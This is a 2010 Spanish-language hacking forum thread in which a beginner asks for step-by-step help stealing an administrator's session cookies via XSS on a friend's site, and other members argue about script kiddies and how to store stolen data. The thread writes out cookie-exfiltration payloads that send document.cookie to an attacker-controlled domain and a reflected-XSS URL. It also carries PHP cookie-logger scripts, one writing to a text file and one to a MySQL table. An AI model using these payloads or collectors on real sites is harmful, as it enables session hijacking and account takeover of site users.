PDA

Ver la versión completa : ayuda con vulnerabilidad xss



crashh
21-10-2010, 23:44
Buenos dias , gente de hackispano, e venido por aca ya que en otras comundades la verdad no me an ayudado ! =( y necesito ayuda ! BUENO AQUI LE SPONGO MIS DUDAS !

Bueno , pues ya logre un gran avanze en lo que corresponde a inyecciones xxs ( crosse site scripting ) y inyecciones html , Bueno ahroa tengo una duda . Tengo la pagina de un amigo por ejemplo crashh.me/wordspress y e logrado encontrar varias vulberabilidades xxs principalmente *, ahi subo algunas fotos
http://img651.imageshack.us/img651/9729/segundotutorial.jpg
http://img221.imageshack.us/img221/3325/segundotutorial2.jpg
http://img258.imageshack.us/img258/760/segundotutorial3.jpg


Pues logre hacer los tres ataques xxs , por lo que se que la pagina es vulnerable verdad , aunque la pregunta ahora seria que hacer verdad ! =)

" posdata : El dueño de la pagina es mi amigo , asi que no quiero hacerle ningun daño , a la pagina es tan solo algo como personal que tenemos entre el yo yo ! =) " asi que por eso no se preocupen , es tan solo *por diversion y para mostrarle que se puede ! "

BUENO SIGAMOS *

Pues , estaba leyendo y lo que debo hacer ahora es instalar *UN CODIGO SCRIPT COMO ESTE

http://img209.imageshack.us/img209/2493/segundo4.jpg


para robar las cookies y asi poder , sacar la pass del administrador verdad ! La foto me quedo un poco mal , pero creo se pueda entender !

--------------------------------------------------------------------------

Pues como ya les habia mensionado haber si alguien me ayuda con una guia paso a paso de como robar LOS COOKIES , en una pagina web vulnerable a xss ! Si alguien me quisiera ayudar , pues bienvenido sea ! Un saludo y desde ya gracias !.

Bueno pues tampoco soy tan comodo de venir a pedir sin antes almenos haber leido ! =)

Bueno pues , lo de robar cookies por xss , lo se todo en teoria ! Osea en una pagina , que es vulnerable a xss y los comentarios estan habilitados .

Primero deberia crearme un dominio web en el cual se enviarian las cookies verdad ! BUENO YA LO HIZE Y ES ESTE

http://img221.imageshack.us/img221/1029/dibujonj.jpg

y ahi deberia pone en un coment de la pagina este codigo

javascript:void(document.location="http://hackedbyjustinxzibit.t35.com/cookie.php?c="+document.cookies)

para que envie las cookies a la direccin mencionada !

AQUI ES LA PARTE QUE NO ENTIENDO!... , SI ESTA BIEN ESE SCRITP Y DEBE SER COLOCADO EN LOS COMENTARIOS ! Y SI EN EL DOMIINIO WEB CREADO SE DEBE CREAR UN DIRECTORIO . O UN ARCHIVO CON UN NUEVO CODIGO , PUES AHI STA TODO , sI ALGUIEN ME QUIERE AYUDAR , LE AGRADECERIA UN MONTON LA VERDAD ! un saludo a toda la comunidad !

Fruit
22-10-2010, 00:17
Podrás robar las cookies, con eso podrás acceder al panel de administración, pero ni mucho menos podrás conseguir la clave. Hazte un .js que saque las cookies y las mande por XMLHttpRequest (yo tenía uno, no sé si lo conservo) y listos, se lo pasas a la persona a la que quieras suplantar.

crashh
22-10-2010, 00:46
Pues exactamente eso es lo que no puedo , no se como robarle las cookies ! Y ya se me esta matando la cabeza ! =) Si me lo podrias explicar te juro que te lo agradeceria un monton Y me uniria de lleno a esta comunidad ! aportanto mis conocimientos que no son muchos pero creo que ayudarian


Un saludo a todos

Fruit
22-10-2010, 00:52
Borra el mail.

Te daré dos pistas:
document.cookie
http://www.w3schools.com/XML/xml_http.asp

Obviamente necesitarás también un servidor web.

hckr
22-10-2010, 15:10
Creía que la gente ya no jugaba a Ikariam xD Te recomiendo la proxima vez que cuando hagas un screenshot que cierres las pestañas. Al menos eso es lo que hago yo :D

Interesante, Fruit...

Un saludo.

crashh
22-10-2010, 20:04
Pues lo de las pestañas ! Lo hare , =)

ALGUIEN ME PUEDE EXPLICAR ESTO !

Para almacenar las cookies, tenemos dos opciones

1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"

A continuación vamos a crear una pagina en php, [" con una pagina web se refiere a un dominio web !???]

este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:

[ si ya tengo un dominio web , creo como directorio el archivo .txt y en el interior creo un archivo con el codigo de mas abajo ?]

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>


ARCHIVO.TXT
Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
que para ver los resultados tienes que entrar en este archivo.

Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:

Citación:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document·cookie;</script>&buscar=;


si alguien me explica eso , seria mas que suficiente , QUE ES PARA ROBAR COOKIES MEDIANTE XSS




" ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a";
fwrite($fff, "$cookie \n";
fclose($fff);
?>

pero ya lo guardo voy al index y me bota este error cuando quiero abrirlo

Parse error: syntax error, unexpected ';' in /home/freehost/t35.com/h/a/hackedbyjustinxzibit/cookies.php/cookies.php on line 8

si alguien sabe algun seria de gran utilidad un saludo !

Fruit
22-10-2010, 21:03
Disculpe, pero me parece que es usted un script-kiddie, así que hasta aquí llegó mi participación en este hio.

hckr
22-10-2010, 21:11
Disculpe, pero me parece que es usted un script-kiddie, así que hasta aquí llegó mi participación en este hio.

Yo igual. En este mundo no hay sitio para este tipo de gente.

Si ni siquiera sabes tu definición, yo te la doy, no hay problema.

http://es.wikipedia.org/wiki/Script_Kiddie

0,5 Saludos.

crashh
22-10-2010, 21:19
Pues lastima ! =( Que piensen eso , bueno no hay problema , pero no por eso dejare esta comunidad ! Seguire leyendo pstda: ese script lo puse porque me fije en ese tutorial

http://taringa.net/posts/ebooks-tutoriales/2306553/tutorial-de--cross-site-scripting-_XSS_como-atacar_ejemplos.html

Pero gracias de todas formas " si algun moderador podria serrar el hilo "

Fruit
22-10-2010, 21:21
Venga, aquí dejo para serrar el hilo.

http://www.vootar.com/imgs/elementos/1266425664_Serruchodecostilla.jpg

hystd
23-10-2010, 02:55
A continuación vamos a crear una pagina en php, [" con una pagina web se refiere a un dominio web !???]

¿Qué diferencia hay entre una página web y un dominio? Dilo tú, ya que seguro que si eres capaz de hacer un XSS, por lo menos sabrás qué es cada cosa...


http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document·cookie;</script>&buscar=;


¿Sabes lo que hace un window.location en javascript? Si es así, no habría problemas en saber la respuesta a tu 1ª pregunta.


1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"

Podrías explicar por qué es tan lógico para ti almacenarlo en un fichero de texto en vez de en una BD?


" ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a";
fwrite($fff, "$cookie \n";
fclose($fff);
?>

pero ya lo guardo voy al index y me bota este error cuando quiero abrirlo

Parse error: syntax error, unexpected ';' in /home/freehost/t35.com/h/a/hackedbyjustinxzibit/cookies.php/cookies.php on line 8

¿Podrías explicarnos a todos que es lo que hace ese código y si está correcto?.

Si respondes a estas preguntas y estamos conformes con las respuestas, entonces hablamos.

Un saludo.

crashh
23-10-2010, 06:04
Bueno , pues primeramente quisiera disculparme con toda la Comunidad , creo sone como un " lammer " que se cree que sabe todo y me parece que eso di a conocer ! Pues , lo que ponia eran tutos que me bajaba y esas eran las partes que no entendia ! Pero comienzo a responder todas las cosas que a dicho " una persona que no critica sino se asesora de todo antes de jusgar ".

¿Qué diferencia hay entre una página web y un dominio? Dilo tú, ya que seguro que si eres capaz de hacer un XSS, por lo menos sabrás qué es cada cosa...

Bueno , pues esa parte , si esta mal de mi parte ! Y xss aprendi leyendo manuales cosas como <h1>hola , haciendo alertas como <script>alert("hola");</script> y asi poder ver si esque la pagina es vulnerable !

¿Sabes lo que hace un window.location en javascript? Si es así, no habría problemas en saber la respuesta a tu 1ª pregunta.

UN WINDOWS LOCATION es en donde sera redirigida la pagina ! " no estoy seguro [ pero tampoco me pondre a buscar ahora ! para que digan que se ! ]


º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable). "[ logicamnete sto hare ]"

LA SEGUNDA ARE LOGICAMENTE PORQUE ES MUCHO MAS FACIL GUARDARLA EN UN ARCHIVO TXT , QUE EN UNA BASE DE DATOS !



" ya creo hago todo eso " y creo el directorio y andentro del directorio un archivo llamado cookies.php con este codigo

<?
$cookie = $_GET['cookie']; " ////CONSEGUIR LA COOKIE "
$fff = fopen("archivo.txt","a"; ///" CREAR UN ARCHIVO TXT EN EL DIRECTORIO
fwrite($fff, "$cookie \n"; ///GUARDAR LA COOKIE ,
fclose($fff); ///CERRAR EL SCRIPT
?>


Bueno eso es lo que se , y la neta no creo se casi nada ! YA QUE ME FALTA UN MUNDO POR LEER , tan solo venia aqui haber si me ayudabn con la creacion del directorio para crear el archivo txt para guardar la cookie , nada mass ! PERO CREO ME HICE ENTENDER MAL !
Un saludo a todos

hystd
23-10-2010, 13:41
Cuando se quiere aprender, hay dos formas de actuar:

1º Experimentar sin tener conocimiento de la teoria y aprender en base a los resultados.
2º Plantear una hipotésis, fundamentada en base a unas teorias y afirmarla o negarla en función de los resultados experimentales.

Como intuirás, la primera no suele ser buena (salvo mínimas excepciones), ya que uno para experimentar, forzosamente parte de unos conocimientos previos... si no, ¿cómo lleva a cabo el experimento?.

Bueno, pues antes de hacer un XSS, te aconsejo que investigues sobre el tema. La cantidad de información que leas será directamente proporcional a las ganas que tengas de conseguir hacer un XSS.

P.D. (Y esto te lo respondo porque no tiene nada que ver con el XSS):

Un domino es un nombre que permite traducir la dirección IP de un servidor.
Una página web es un código (siempre HTML) que se invoca, se crea y se ejecuta cuando se accede a un servidor web.

Ejemplo: Acceder a http://72.14.235.104/ es lo mismo que acceder a http://www.google.com, con la ventaja de que la conexión al primero es mucho más rápida que al segundo... ¿por qué es más rápida?, entonces si es más rápida, ¿por qué se utiliza normalmente la segunda forma?.

Un saludo.

chewarrior
23-10-2010, 14:46
uamain mon mina mandan

bueno



<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a";
fwrite($fff, "$cookie \n";
fclose($fff);
?>


uamain min mina mandan

umm

la sintaxis u,m (yo no e dixo naa XD)

Pd: No intentes hacer la casa por el tejado, te lo digo por experiencia, primero aprende algo de java script y php, no hace falta que te los estudios a fondo, solo con adquirir unos conocimientos basicos ya te servira para lo que quieres hacer y muchas cosas mas.

Fruit
23-10-2010, 14:50
LA SEGUNDA ARE LOGICAMENTE PORQUE ES MUCHO MAS FACIL GUARDARLA EN UN ARCHIVO TXT , QUE EN UNA BASE DE DATOS !No creas... lo malo es que tienes que disponer de una base de datos, pero si ya la tienes, es coser y cantar.

Se te llama script-kiddie porque quieres crackear algo usando un código copypasteado de un sitio. Y por no saber no sabes ni qué hace.

chewarrior
23-10-2010, 16:15
Se te llama script-kiddie porque quieres crackear algo usando un código copypasteado de un sitio. Y por no saber no sabes ni qué hace.



Yo creo que el solo quiere aprender, deveriamos de ayudarle y no limitarnos a llamarle script-kiddie, a mi no se me permite poner enlaces asi que nada (normas del foro xd), pero estaria bien que le pasaran algun tutorial de html, php y java script.




No creas... lo malo es que tienes que disponer de una base de datos, pero si ya la tienes, es coser y cantar.


Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.

Fruit
23-10-2010, 16:30
Yo creo que el solo quiere aprender, deveriamos de ayudarle y no limitarnos a llamarle script-kiddie, a mi no se me permite poner enlaces asi que nada (normas del foro xd), pero estaria bien que le pasaran algun tutorial de html, php y java script.Tú sí puedes poner enlaces, lo que no puedes es subir archivos.
Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');

chewarrior
23-10-2010, 16:39
INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');


Eso sera desde la consola,porque si lo piensas hacer asi en php, esta pero que listo xd.

hystd
23-10-2010, 17:18
Personalmente me parece mucho mas complicado, tienes que conectar a la base de datos,moverte por las tablas,hacer las peticiones (tienes que saber algo de sql), es mucho mas facil utilizar un archivo de txt para insertar datos.

Según lo que dices utilizando ficheros, tienes que abrirlo, escribir y cerrarlo y además saber tratar ficheros.
Utilizar un fichero, según el código anterior, ocupa 4 líneas. En el caso de una BD... sólo 3. Por tanto creo más fácil utilizar BD si, como bien dice Fruit, esa BD ya existe.




INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');


Eso sera desde la consola,porque si lo piensas hacer asi en php, esta pero que listo xd.

¿Cual es el problema? Dilo y así aprendemos todos.

Un saludo.

Fruit
23-10-2010, 17:30
Según lo que dices utilizando ficheros, tienes que abrirlo, escribir y cerrarlo y además saber tratar ficheros.
Utilizar un fichero, según el código anterior, ocupa 4 líneas. En el caso de una BD... sólo 3. Por tanto creo más fácil utilizar BD si, como bien dice Fruit, esa BD ya existe.Y eso por no hablar de las race conditions y de lo lenta que se hace la navegación por un archivo cuando ya se ha alcanzado cierto número de líneas.

chewarrior
23-10-2010, 18:07
<?

if (!$coment){

echo "no se a insertado nada orangutan";
exit;
}

$coment = addslashes($coment); \\ filtramos caracteres especiales

$db = mysql_pconnect("127.0.0.1", "root", "root"); \\ conectamos

if (!$db)
{
echo "Error: No se puede conectar a la base de datos. Por favor inténtalo de nuevo.";
exit;
}

mysql_select_db("datos"); \\ cojemos la base de datos

\\ query variable que guarda la peticion

$query = "insert into comentarios values ('".$indiceid."','".$nombre."' ,'".$mai."', '".$coment."')"; \\ comando sql int comentarios \\tabla. values \\ valores indice autoincrement \\ nombre \\ mail \\ comentario

$result = mysql_query($query); \\ peticion

if ($result==FALSE) {
echo "Te jodes fracasado";
}


?>


Es mucho mas dificil porque tienes que tener mas conocimientos no solo con saber php, si no que tambien deves de saber Crear bases de datos, y comandos sql (casi nada e)


En cambio solo tratando con archivos txt me parece mucho mas sencillo



$directorio="C:\"
$cookie = $_GET['cookie'];
$fp = fopen($directorio,"a"); \\ en 3 lineas
fwrite($fp,$cookie);
fclose($fp);




Y eso por no hablar de las race conditions y de lo lenta que se hace la navegación por un archivo cuando ya se ha alcanzado cierto número de líneas.


Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.

Fruit
23-10-2010, 18:14
Ya pero estamos hablando de guardar una cookie, no vamos hacer una pagina web segura y rapida.¿Siendo atacante no quieres asegurar tu página? Me sé de uno de por aquí que tuvo una muy buena experiencia con algo similar. No daré nombres, él sabe de qué hablo :rolleyes:

chewarrior
23-10-2010, 18:23
¿Siendo atacante no quieres asegurar tu página? Me sé de uno de por aquí que tuvo una muy buena experiencia con algo similar. No daré nombres, él sabe de qué hablo


Y que tiempo de reacion tendra la victimia, si en cuanto la victima pique el anzuelo, borras la pagina y todas los pruevas.

De todas formas yo estoy diciendo que es mas facil, pero eso no significa que sea mejor.

crashh
23-10-2010, 20:32
Bueno , pues se a creado un foro de discucion con respecto a una base de datos y un archivo txt ! " Me gusto eso de NO hagas una casa por el tejado , en eso creo tienes mucha razon sabes , si estaba leyendo un poco de java ! de php no digo lo mismo ! , pero esque mi objetivo era solo entrar en la pagina que mencione por un reto personal con mi amigo ! =) Pero de xss , si les puedo decir que e lido como no creen ,me mate casi dos semanas leyendo cuantos tipos de ataque , Y APRENDIEDNO LOs codigos , para saber que significan ! =) Y lamento que me digan scriptkidy ! Ya que la verdad yo no queria venir aqui a hacerme el sabiondo , tan solo queria venir a que me ayuden con eso ! =( Pero gracias a los que me quisieron apoyar , Y no se hagan drama . ! Si no se puede ayudar , pues no se podra! AHORA ME PONDRE A LEER PARA CREAR UNA BASE DE DATOS , Y AHI GUARDAR LA COOKIE PARA VER COMO ME VA , Pero si alguien me quiere ayudar , con lo de .txt ! Pues muchas gracias.

hystd
23-10-2010, 21:04
Ahá!!! Entonces si se puede hacer un INSERT desde PHP ¿no?... Tú mismo lo acabas de demostrar. Es que no sé si te entendí mal, pero creo haber entendido en tu anterior post, que "vas listo" (según has dicho literalmente), si quieres, desde PHP, hacer un:

INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');

Sinceramente... sigo pensando que no le veo la complejidad a utilizar una BD. Además de que tu código se puede reducir a exactamente 3 líneas (una menos que con ficheros):

<?
mysql_connect("servidorBD","usuario","password");
mysql_select_db("basededatos");
mysql_query("INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie')");
?>

Pues si nos ponemos a añadir mensajes de avisos, comentarios, y demás, el código se puede ampliar como quieras, incluso ofuscarlo si nos ponemos así :).

Un saludo.

chewarrior
23-10-2010, 23:51
Ahá!!! Entonces si se puede hacer un INSERT desde PHP ¿no?... Tú mismo lo acabas de demostrar. Es que no sé si te entendí mal, pero creo haber entendido en tu anterior post, que "vas listo" (según has dicho literalmente), si quieres, desde PHP, hacer un:


Lo que me sorprende es que despues de demostrarlo todavia pones en duda mis conocimientos(o eso es lo que me parece a mi, tal vez entendi mal el sentido de tus frases)

Bueno para que me entiendas

vas listo si intentas hacer esto;



<?
INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');
?>


Asi de claro, si uno no pone el codigo completo de lo que quiere hacer, lo unico que hace es crear confusion.



Sinceramente... sigo pensando que no le veo la complejidad a utilizar una BD


Complejo no es(nada de lo que ya sabes es dificil), el problema es que para alguien que esta aprendiendo es mas facil aprender solo un lenguaje de programacion web como php, que ponerse con php y sql para comerselos los dos juntitos,que seria mas correcto si,pero tambien mas dificil.

Fruit
23-10-2010, 23:59
Asi de claro, si uno no pone el codigo completo de lo que quiere hacer, lo unico que hace es crear confusion.Y si lo pone, fomenta el scriptkiddismo del OP de este tema.

chewarrior
24-10-2010, 00:20
Y si lo pone, fomenta el scriptkiddismo del OP de este tema.


Una pregunta,ustedes cuando empezaron, la primera vez que se pusieron delante de una computadora, no sintieron ese ansia de avanzar demasiado rapido, pues eso es para mi un scriptkidd, es alguien que tiene ansias por aprender, pero se esta equivocando en la manera de adquirir los conocimientos, lo quieren ya y ahora y eso no es asi, pero para eso estamos los mas veteranos, para guiarlos por el verdadero camino del conocimiento, no para decirles eres un scriptkidd, asi es como conseguimos verdaderas ordas de lamers, al llamarles de manera ofensiva scriptkidd, solo conseguimos que se empecinen mas en sus propositos lamerosos,en general pienso que hay que ser mas comprensivos con los principiantes. (esta es mi opinion,que no tiene porque ser la verdad absoluta xd)

crashh
24-10-2010, 03:39
Una pregunta,ustedes cuando empezaron, la primera vez que se pusieron delante de una computadora, no sintieron ese ansia de avanzar demasiado rapido, pues eso es para mi un scriptkidd, es alguien que tiene ansias por aprender, pero se esta equivocando en la manera de adquirir los conocimientos, lo quieren ya y ahora y eso no es asi, pero para eso estamos los mas veteranos, para guiarlos por el verdadero camino del conocimiento, no para decirles eres un scriptkidd, asi es como conseguimos verdaderas ordas de lamers, al llamarles de manera ofensiva scriptkidd, solo conseguimos que se empecinen mas en sus propositos lamerosos,en general pienso que hay que ser mas comprensivos con los principiantes. (esta es mi opinion,que no tiene porque ser la verdad absoluta xd)

Exacto , no creo nadie nacio sabiendo , o aprendio todo de una sin hacer alguna pregunta ! LO BUENO ES QUE HAY PERSONAS , que talvez se acuerdan como comenzaron , y si dan cuenta que para los que estamos comenzando las cosas que para los veteranos parecen 1 " faciles " para nosotros los newbies " novatos " son un poco dificilies , Bueno la verdad , yo si me quisiera integrar a esta comunidad por personas como che warrior que la verdad , ! Son los que verdaderamente saben y son los que ayudan que una comundad avanze y se haga famosa ! Bueno un saludo a todos y espero mis palabras , no les resulent ! ARROGANTES ! o algo parecido a eso ! =(

hystd
24-10-2010, 04:15
Lo que me sorprende es que despues de demostrarlo todavia pones en duda mis conocimientos(o eso es lo que me parece a mi, tal vez entendi mal el sentido de tus frases)

Simplemente remarco una contradicción en dos posts tuyos, y no sabía con cual quedarme... nada más. Me alegro que te quede claro que se puede hacer un INSERT desde PHP. No puse en duda tus conocimientos, sólo que en un post dices una cosa, y en otro posterior, dices justo lo contrario.

Otra cosa, Fruit no puso el código entre "<?" y "?>", sólo puso la sentencia DML de SQL. Hay mucha diferencia entre lo que ha puesto Fruit:


INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');

Y lo que has presupuesto tú posteriormente:



<?
INSERT INTO datos (usuario, ip, cookie) VALUES ('$usuario', '$ip', '$cookie');
?>



Complejo no es(nada de lo que ya sabes es dificil), el problema es que para alguien que esta aprendiendo es mas facil aprender solo un lenguaje de programacion web como php, que ponerse con php y sql para comerselos los dos juntitos,que seria mas correcto si,pero tambien mas dificil.

Alguien que se pone a aprender un lenguaje, no empieza por hacer un XSS. Se supone que si está haciendo un XSS y utiliza PHP, por lo menos sabe escribir el código sin errores sintácticos. No cerrar un paréntesis al final de la línea le puede pasar a cualquiera... pero si el intérprete te señala la línea y el error, y encima no sabe corregirlo y pide ayuda, entonces es que está demostrando claramente que su objetivo no es aprender, sino lograr hacer un XSS y punto.


Una pregunta,ustedes cuando empezaron, la primera vez que se pusieron delante de una computadora, no sintieron ese ansia de avanzar demasiado rapido, pues eso es para mi un scriptkidd, es alguien que tiene ansias por aprender, pero se esta equivocando en la manera de adquirir los conocimientos, lo quieren ya y ahora y eso no es asi, pero para eso estamos los mas veteranos, para guiarlos por el verdadero camino del conocimiento, no para decirles eres un scriptkidd, asi es como conseguimos verdaderas ordas de lamers, al llamarles de manera ofensiva scriptkidd, solo conseguimos que se empecinen mas en sus propositos lamerosos,en general pienso que hay que ser mas comprensivos con los principiantes. (esta es mi opinion,que no tiene porque ser la verdad absoluta xd)

El problema es cuando se oyen campanas y no se sabe dónde... El problema está en que sólo se lee el principio y el final de los artículos/guias/tutoriales sin ni siquera ojear el medio. Cuando se hace así, no suele ser ayudado.

Llegados a este punto es recomendable recordar el siguiente link (http://www.sindominio.net/ayuda/preguntas-inteligentes.html) para que los newbies como decís, tengan más éxito en futuras ocasiones.


Exacto , no creo nadie nacio sabiendo , o aprendio todo de una sin hacer alguna pregunta ! LO BUENO ES QUE HAY PERSONAS , que talvez se acuerdan como comenzaron , y si dan cuenta que para los que estamos comenzando las cosas que para los veteranos parecen 1 " faciles " para nosotros los newbies " novatos " son un poco dificilies , Bueno la verdad , yo si me quisiera integrar a esta comunidad por personas como che warrior que la verdad , ! Son los que verdaderamente saben y son los que ayudan que una comundad avanze y se haga famosa ! Bueno un saludo a todos y espero mis palabras , no les resulent ! ARROGANTES ! o algo parecido a eso ! =(

1º Por supuesto cuando aprendes, te surgen miles de preguntas, y cuando encuentras las respuestas, te surgen 10 preguntas más.
2º Si en vez de estar pidiendo ayuda, estuvieras buscando información y leyendo, probablemente tendrías la respuesta ya. Pues lo que pedías al principio de este hilo no es nada nuevo que no se encuentre en los primeros enlaces de google... incluso en la wikipedia tienes ejemplos.
3º Si te vas a integrar en esta comunidad, que no sea para que (y cito textualmente del link anterior) "te intenten digerir con una cuchara la información", por supuesto no en este foro. Para eso se escriben artículos, libros, blogs, listas de correo, etc. Pero un foro no está para hacer tutoriales, sino para resolver dudas a un estudio previo.
4º Me reservo el derecho de contestar a lo de cómo se hace que una "comunidad sea famosa y avance", pero desde luego no es cómo dices.

PD: No voy a seguir con este tema... si crashh decide intentar esforzarse en aprender, verá como las cosa cambia y nos habríamos ahorrado tanto debate.

Un saludo.

crashh
24-10-2010, 07:50
Pues primeramente eh sido un idota ! ACLARO ESTO YA QUE LA PAGINA ANTES MENCIONADA NO ES VULNERABLE ! =) PORQUE SEGUN ESTABA LEYENDO HOY , LAS VULNERABILIDADES SE DABAN PORQUE LA VERSION DE MI EXPLORADOR " CHORME " , era antigua y leia mas etiquetas de las que habian , esto me di cuenta cuando trataba de hacerlo desde mi otra pc !=( Y con respecto , cualquier moderador puede cerrar el post ! ya que almenos se a creado un debate constructivo , un poco " enojon " pero al final cada uno pudo haber aprendido algo ! UN SALUDO A TODOS !

hckr
27-10-2010, 20:56
En un foro poner mayúsculas es sinónimo de que estás gritando, y a no ser que tengas un trastornos bipolar y de pronto te pongas a gritar en la vida real no hay razón para poner tantas mayus. Además, resulta molesto a la vista y al leerlo.

hystd
27-10-2010, 21:32
Cierro, porque esto no da más de sí.

Un saludo.